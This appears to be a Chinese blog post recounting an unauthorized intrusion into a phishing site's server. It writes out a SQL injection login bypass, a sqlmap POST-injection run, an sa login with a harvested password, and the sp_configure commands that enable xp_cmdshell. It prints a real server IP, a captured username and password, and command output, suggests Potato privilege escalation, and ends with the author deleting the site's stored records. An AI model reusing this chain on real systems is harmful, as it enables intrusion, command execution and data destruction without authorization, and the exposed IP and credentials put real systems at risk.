弱智钓鱼渗透实战

前言

今天在群里水群,偶然间发现一个钓鱼站点,随便搞搞看。

20200223180942.png

首先看一下action地址,进去转了一圈,发现不是后台,没意思。

20200223181047.png

接着就上扫描器,扫了一圈啥也没有。

最后扫下端口,有惊喜了,看这个界面,基本就是弱智后台,直接万能密码淦。

20200223181203.png

' or 1='1
' or 1='1

好的进了后台了,然后找到了真实账号密码。

903998876
li158669

好的,进了后台就完了?当然是想办法拿到shell再说,后台肯定有注入,先拿去sqlmap跑一下POST注入。

20200223194736.png

果然有,直接就出来了,问题就在于,居然时间盲注,太费时间了。

扫端口,发现开放1433,就想着sa进去,索性跑一下密码。

sqlmap -r sql.txt --passwords

在漫长的盲注等待期间,我试了一下上面拿到的密码尝试了一下。

sa/li158669

于是就进去了,服务器没开xp_cmdshell,所以我们帮他开启一下。

exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'xp_cmdshell',1
reconfigure

好了能执行cmd命令了,首先whoami一下。

nt service\mssqlserver

ipconfig一下


Windows IP 配置

   主机名  . . . . . . . . . . . . . : ebs-48474
   主 DNS 后缀 . . . . . . . . . . . : 
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否

以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter #2
   物理地址. . . . . . . . . . . . . : 52-54-00-97-D6-EC
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::396f:c860:10bf:a68e%13(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.223.179(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 307385344
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
   DNS 服务器  . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter
   物理地址. . . . . . . . . . . . . : 52-54-00-9C-3D-19
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::c111:6e76:9e15:cc4f%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 211.149.223.179(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 211.149.223.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-4F-3B-5C-52-54-00-9C-3D-19
   DNS 服务器  . . . . . . . . . . . : 223.5.5.5
                                       114.114.114.114
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

隧道适配器 isatap.{F62CBCB3-434F-456D-B57D-E07EF3C5621C}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{E002F1A8-A64F-4703-83CB-4B5D8E6C22ED}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 6TO4 Adapter:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   IPv6 地址 . . . . . . . . . . . . : 2002:d395:dfb3::d395:dfb3(首选) 
   默认网关. . . . . . . . . . . . . : 
   DNS 服务器  . . . . . . . . . . . : 223.5.5.5
                                       114.114.114.114
   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用

netstat -an一下


活动连接

  协议  本地地址          外部地址        状态
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:987            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:988            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:33890          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49291          0.0.0.0:0              LISTENING
  TCP    192.168.223.179:139    0.0.0.0:0              LISTENING
  TCP    211.149.223.179:139    0.0.0.0:0              LISTENING

我对服务器并不感兴趣,就懒得上他服务器玩玩了,远程桌面应该就是端口就是33890。

如果需要提权,请自行想办法,建议用Potato提权吧,留给愿意折腾的老哥去吧。

*Potato

后记

既然来过了,顺带清空了后台记录的账号密码。

TIM20200223202223.png

“轻轻地我走了,正如我轻轻地来,挥一挥手,不带走一片云彩”

TIM20200223202357.png